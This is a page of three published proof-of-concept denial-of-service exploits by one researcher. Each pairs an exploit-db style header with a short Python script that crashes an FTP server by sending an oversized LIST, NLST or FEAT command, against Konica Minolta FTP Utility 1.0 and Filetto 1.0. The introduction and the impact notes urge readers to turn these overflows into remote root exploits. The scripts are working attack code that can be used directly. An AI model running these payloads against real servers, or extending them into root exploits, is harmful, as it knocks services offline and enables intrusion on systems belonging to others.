In this section, you will find some denial of service vulnerabilities that an individual 
  can use to crash a server. If you know about software development, you can use your knowledge 
  in ASM and C to develop a remote exploit that can use those overflow vulnerabilities 
  to root a system. In other words, you can use those vulnerabilities to develop a 
  remote buffer overflow exploit that will root a system without any user interaction. 


  ====================================================================================================
  =============== [ Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC) ] ===============
  ====================================================================================================

  # Exploit Title: Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC) 
  # Date: [05-16-2020]
  #
  # Found by: Alvaro J. Gene (Socket_0x03)
  # Email: Socket_0x03 (at) teraexe (dot) com
  # Website: www (dot) teraexe (dot) com
  # 
  # Software Link: https://konica-minolta-ftp-utility.software.informer.com/download/
  # Vulnerable Application: Konica Minolta FTP Utility
  # Version: 1.0
  # Server: FTP Server
  # Vulnerable Command: LIST
  # Tested on: Windows 7 SP1
  # 
  # Impact: There is a buffer overflow vulnerability in the LIST command of the FTP server
  # "Konica Minolta FTP Utility" that will allow an attacker to overwrite some registers, 
  # such as EAX, ESI, EDI... Even though the next codes will crash the FTP server and overwrite 
  # some registers, an individual can use the vulnerable command to build a remote buffer 
  # overflow exploit that will root a system without any user interaction. 
  # 
  # References:
  # https://packetstormsecurity.com/files/157734/konicaminoltaftputility10-dos.txt
  # https://www.exploit-db.com/exploits/48501
  # https://exploit.kitploit.com/2020/05/konica-minolta-ftp-utility-10-denial-of.html
  # https://cxsecurity.com/issue/WLB-2020050152
  # https://www.cnvd.org.cn/flaw/show/CNVD-2020-29212
  

  from ftplib import FTP

  ftp = FTP('192.168.0.16')

  buffer = "A" * 1500

  ftp.login()

  ftp.retrlines('LIST ' + buffer)


  ====================================================================================================
  =============== [ Konica Minolta FTP Utility v1.0 - 'NLST' Denial of Service (PoC) ] ===============
  ====================================================================================================

  # Exploit Title: Konica Minolta FTP Utility v1.0 - 'NLST' Denial of Service (PoC) 
  # Date: [05-16-2020]
  #
  # Found by: Alvaro J. Gene (Socket_0x03)
  # Email: Socket_0x03 (at) teraexe (dot) com
  # Website: www (dot) teraexe (dot) com
  #
  # Software Link: https://konica-minolta-ftp-utility.software.informer.com/download/
  # Vulnerable Application: Konica Minolta FTP Utility
  # Version: 1.0
  # Server: FTP Server
  # Vulnerable Command: NLST
  # Tested on: Windows 7 SP1
  # 
  # Impact: There is a buffer overflow vulnerability in the NLST command of the FTP server
  # "Konica Minolta FTP Utility" that will allow an attacker to overwrite some registers, 
  # such as EAX, ESI, EDI... Even though the next codes will crash the FTP server and overwrite 
  # some registers, an individual can use the vulnerable command to build a remote buffer 
  # overflow exploit that will root a system without any user interaction. 
  # 
  # References:
  # https://packetstormsecurity.com/files/157734/konicaminoltaftputility10-dos.txt
  # https://www.exploit-db.com/exploits/48502
  # https://exploit.kitploit.com/2020/05/konica-minolta-ftp-utility-10-denial-of.html
  # https://cxsecurity.com/issue/WLB-2020050153
  # https://www.cnvd.org.cn/flaw/show/CNVD-2020-29213
  

  from ftplib import FTP

  ftp = FTP('192.168.0.16')

  buffer = "A" * 1500

  ftp.login()

  ftp.retrlines('NLST ' + buffer)


  ====================================================================================================
  ======================== [ Filetto v1.0 - 'FEAT' Denial of Service (PoC) ] =========================
  ====================================================================================================

  # Exploit Title: Filetto v1.0 - 'FEAT' Denial of Service (PoC) 
  # Date: [05-13-2020]
  #
  # Found by: Alvaro J. Gene (Socket_0x03)
  # Email: Socket_0x03 (at) teraexe (dot) com
  # Website: www (dot) teraexe (dot) com
  #
  # Software Link: https://sourceforge.net/projects/filetto
  # Vulnerable Application: Filetto
  # Version: 1.0 (last version. Updated: 01/31/2020)
  # Server: FTP Server
  # Vulnerable Command: FEAT
  # Tested on: Windows XP SP2 and Windows 7 SP1.
  # 
  # References:
  # https://packetstormsecurity.com/files/157735/Filetto-1.0-Denial-Of-Service.html
  # https://www.exploit-db.com/exploits/48503
  # https://exploit.kitploit.com/2020/05/filetto-10-denial-of-service.html
  # https://cxsecurity.com/issue/WLB-2020050151


  from socket import *

  host = "192.168.0.14"
  port = 2021
  username = "Socket_0x03"
  password = "password"

  s = socket(AF_INET, SOCK_STREAM)
  s.connect((host, port))
  print s.recv(1024)

  s.send("USER %s\r\n" % (username))
  print s.recv(1024)

  s.send("PASS %s\r\n" % (password))
  print s.recv(1024)

  buffer = "FEAT "
  buffer += "\x41\x2c" * 11008
  buffer += "\r\n"

  s.send(buffer)
  print s.recv(1024)

  s.close()